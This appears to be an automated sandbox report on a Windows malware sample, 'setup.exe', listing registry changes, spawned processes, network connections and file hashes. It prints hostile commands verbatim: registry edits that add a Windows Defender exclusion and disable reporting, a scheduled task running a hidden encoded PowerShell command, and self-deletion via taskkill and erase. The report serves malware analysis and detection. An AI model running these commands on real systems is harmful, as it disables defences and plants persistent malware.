74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\Documents\GuardFox\xUQkYU62TJdbos0qqRtjjjOA.exe
"C:\Users\Admin\Documents\GuardFox\xUQkYU62TJdbos0qqRtjjjOA.exe"
C:\Users\Admin\Documents\GuardFox\qZ9asIxVFfIkyr7tC6Yn_R5F.exe
"C:\Users\Admin\Documents\GuardFox\qZ9asIxVFfIkyr7tC6Yn_R5F.exe"
C:\Users\Admin\Documents\GuardFox\F0_VOT2nFJ6jwNcBGGlSS5B4.exe
"C:\Users\Admin\Documents\GuardFox\F0_VOT2nFJ6jwNcBGGlSS5B4.exe"
C:\Users\Admin\Documents\GuardFox\6cYGcvtFY0A7rKnVNki2dVX9.exe
"C:\Users\Admin\Documents\GuardFox\6cYGcvtFY0A7rKnVNki2dVX9.exe"
C:\Users\Admin\Documents\GuardFox\s0le_fm_4gWqZWQK2MkxHiM0.exe
"C:\Users\Admin\Documents\GuardFox\s0le_fm_4gWqZWQK2MkxHiM0.exe"
C:\Users\Admin\AppData\Local\Temp\is-SL8QU.tmp\BfE8yx2fkiu6S97L10r7DVbH.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SL8QU.tmp\BfE8yx2fkiu6S97L10r7DVbH.tmp" /SL5="$90126,3944858,54272,C:\Users\Admin\Documents\GuardFox\BfE8yx2fkiu6S97L10r7DVbH.exe"
C:\Users\Admin\Documents\GuardFox\Jhv610CCO7ohTiXzS8CCeWKd.exe
"C:\Users\Admin\Documents\GuardFox\Jhv610CCO7ohTiXzS8CCeWKd.exe"
C:\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe
"C:\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe"
C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
"C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe"
C:\Users\Admin\Documents\GuardFox\BfE8yx2fkiu6S97L10r7DVbH.exe
"C:\Users\Admin\Documents\GuardFox\BfE8yx2fkiu6S97L10r7DVbH.exe"
C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe
"C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe"
C:\Users\Admin\Documents\GuardFox\IvrwUANQHwafTYHqZyTWOH2T.exe
"C:\Users\Admin\Documents\GuardFox\IvrwUANQHwafTYHqZyTWOH2T.exe"
C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
"C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9750.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSAF62.tmp\Install.exe
.\Install.exe /NENsddidexHOV "525403" /S
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\0f55cdb1-87bf-468c-92ec-c4a4fe31428a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "6cYGcvtFY0A7rKnVNki2dVX9.exe" /f & erase "C:\Users\Admin\Documents\GuardFox\6cYGcvtFY0A7rKnVNki2dVX9.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "6cYGcvtFY0A7rKnVNki2dVX9.exe" /f
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
"C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe" --Admin IsNotAutoStart IsNotTask
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
"C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gxRujLDhI" /SC once /ST 19:09:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240218215835.log C:\Windows\Logs\CBS\CbsPersist_20240218215835.cab
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 624
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 624
C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe
"C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gxRujLDhI"
C:\Windows\system32\taskeng.exe
taskeng.exe {2B62159A-F554-4B04-BAB7-6093CAB2E4BB} S-1-5-21-3427588347-1492276948-3422228430-1000:QVMRJQQO\Admin:Interactive:[1]
Network
| Country | Destination | Domain | Proto |
| RU | 147.45.40.172:80 | 147.45.40.172 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | gugle.fun | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| US | 8.8.8.8:53 | 294down-river.sbs | udp |
| US | 8.8.8.8:53 | acenitive.shop | udp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| US | 8.8.8.8:53 | cczhk.com | udp |
| US | 8.8.8.8:53 | flex.sunaviat.com | udp |
| US | 8.8.8.8:53 | cleued.com | udp |
| RU | 5.42.65.115:80 | 5.42.65.115 | tcp |
| RU | 193.233.132.216:80 | tcp | |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 104.21.45.242:80 | flex.sunaviat.com | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| KR | 211.119.84.112:80 | cczhk.com | tcp |
| US | 172.67.180.151:80 | 294down-river.sbs | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| US | 172.67.180.151:443 | 294down-river.sbs | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| KR | 211.119.84.112:80 | cczhk.com | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 172.67.178.79:443 | gugle.fun | tcp |
| US | 172.67.178.79:443 | gugle.fun | tcp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 172.67.154.10:443 | cleued.com | tcp |
| US | 172.67.215.205:443 | acenitive.shop | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | pergor.com | udp |
| US | 104.21.32.227:443 | pergor.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 172.67.178.79:80 | gugle.fun | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 172.67.178.79:443 | gugle.fun | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 8.8.8.8:53 | udp | |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| NL | 194.104.136.64:443 | 632432.site | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| RU | 87.240.137.164:80 | tcp | |
| RU | 193.233.132.216:80 | tcp | |
| RU | 193.233.132.216:38324 | 193.233.132.216 | tcp |
| RU | 147.45.40.172:80 | 147.45.40.172 | tcp |
| US | 8.8.8.8:53 | iplis.ru | udp |
| US | 104.21.63.150:443 | iplis.ru | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 185.172.128.24:80 | 185.172.128.24 | tcp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | sjyey.com | udp |
| IR | 151.233.51.166:80 | sjyey.com | tcp |
| IR | 151.233.51.166:80 | sjyey.com | tcp |
| IR | 151.233.51.166:80 | sjyey.com | tcp |
| IR | 151.233.51.166:80 | sjyey.com | tcp |
| IR | 151.233.51.166:80 | sjyey.com | tcp |
| IR | 151.233.51.166:80 | sjyey.com | tcp |
| IR | 151.233.51.166:80 | sjyey.com | tcp |
Files
memory/2624-0-0x0000000140000000-0x00000001408EF000-memory.dmp
memory/2624-1-0x0000000140000000-0x00000001408EF000-memory.dmp
memory/2624-2-0x000007FEFD7D0000-0x000007FEFD83C000-memory.dmp
memory/2624-3-0x000007FEFD7D0000-0x000007FEFD83C000-memory.dmp
memory/2624-4-0x000007FEFD7D0000-0x000007FEFD83C000-memory.dmp
memory/2624-5-0x000007FEFD7D0000-0x000007FEFD83C000-memory.dmp
memory/2624-6-0x00000000002E0000-0x00000000002E1000-memory.dmp
memory/2624-7-0x00000000777A0000-0x0000000077949000-memory.dmp
memory/2624-9-0x000007FE80010000-0x000007FE80011000-memory.dmp
memory/2624-8-0x0000000140000000-0x00000001408EF000-memory.dmp
memory/2624-10-0x0000000140000000-0x00000001408EF000-memory.dmp
memory/2624-11-0x0000000140000000-0x00000001408EF000-memory.dmp
memory/2624-12-0x0000000140000000-0x00000001408EF000-memory.dmp
memory/2624-13-0x0000000140000000-0x00000001408EF000-memory.dmp
memory/2624-16-0x0000000140000000-0x00000001408EF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab521.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar553.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\Documents\GuardFox\6cYGcvtFY0A7rKnVNki2dVX9.exe
| MD5 | 5d37fbb04a77641704922f39003726b2 |
| SHA1 | 4d15bee75cc3bb3e4140a5df68a89807dc3b4be8 |
| SHA256 | 069792a1a8d73e6056437729625fba756a5c99385d8bcb7baf3878b283f427cf |
| SHA512 | 7dd8fe0d50c67c601fb19bddc11b10e19f9d0d34bc41712513c05392e587a5b0360015d5f4d225d86a949207952d6caf8b8a054ea2fd1296ebe11f54a641f935 |
memory/2624-89-0x0000000140000000-0x00000001408EF000-memory.dmp
C:\Users\Admin\Documents\GuardFox\F0_VOT2nFJ6jwNcBGGlSS5B4.exe
| MD5 | f6242b118a5b29865f9a5c4b948d8acb |
| SHA1 | 5525b96cd8c48f7e87526d1b357a54a13e8b41b3 |
| SHA256 | cfc0cf5bde0e5bc444f66d4b508b5452f00ebf99c867eedb995f7b21da1fe5e5 |
| SHA512 | 3504a1ae34aff4e98b525d1d7c32d533adec3a4ef98c7c7561c0ed7b52060e58357de1a15ba20b183ab374a6e6148dd35fdd6e923eded0b6a6ce034d4d0e8c65 |
C:\Users\Admin\Documents\GuardFox\BfE8yx2fkiu6S97L10r7DVbH.exe
| MD5 | ac7815efe83551a36f7336f3a237e9a3 |
| SHA1 | 91b2c06aa32c5fb02bf620679ecdd6493877a955 |
| SHA256 | 1f08552d1151cfcb24a7acdb4ebbe22e772033ef5142b3e9ab5de158d75fb37d |
| SHA512 | b6c92902e382dc861f5f6e0e8c1faea4b3e8ccd5b4fd98e416eab0fa3d97dcd5c498aee546472e86f644eb58d6f2d8f29ed4e305548d83c6905d43ce20a4f4f2 |
C:\Users\Admin\Documents\GuardFox\FFiKfTBiUrpfk88gvzxLozn1.exe
| MD5 | 84e5ccdfbdfd9d92456c890e6d8641d4 |
| SHA1 | bc1f99c3a86a6a3258e6baa57c26be3a4403146e |
| SHA256 | d4b9f4354252a9c203a211d8d600113f9d236ecca6234f43b5aa02350b5b24cc |
| SHA512 | 5f57e132b811e83f167f4b624397262b83982c9781dd05cba20bd2de798fcf1fd010c268060fcdf5601d5c2af1d4a61c2ff8a3ed659a25ceb6a3ef1034b8cf4c |
C:\Users\Admin\Documents\GuardFox\kVYnASPkuebAlAjgIsO6j9i3.exe
| MD5 | 5bbad4a3271e47703519acc99245a29a |
| SHA1 | 34fc78b8677639eaa81f2bf62d411aed09c5ef73 |
| SHA256 | 9c459f0e92b487c69ccc4a62e507b9ec332e4feaa7cec4fafe1700c1568df44b |
| SHA512 | eab79347b63de853c264b1b368994b95b647480ae9eb29b1317a618f608b93c9896b087d1b1473842f5d3b82626c76023675b01a195e006531a79e301dac94db |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 889c0b7e94ec946de9ec154f2a93b53e |
| SHA1 | 6557866a02d14f73a247022abcb501f946d86842 |
| SHA256 | a012a92865bac7a8831e634757d5556fbd8a888d7acfce36a3fea0a643ad1db7 |
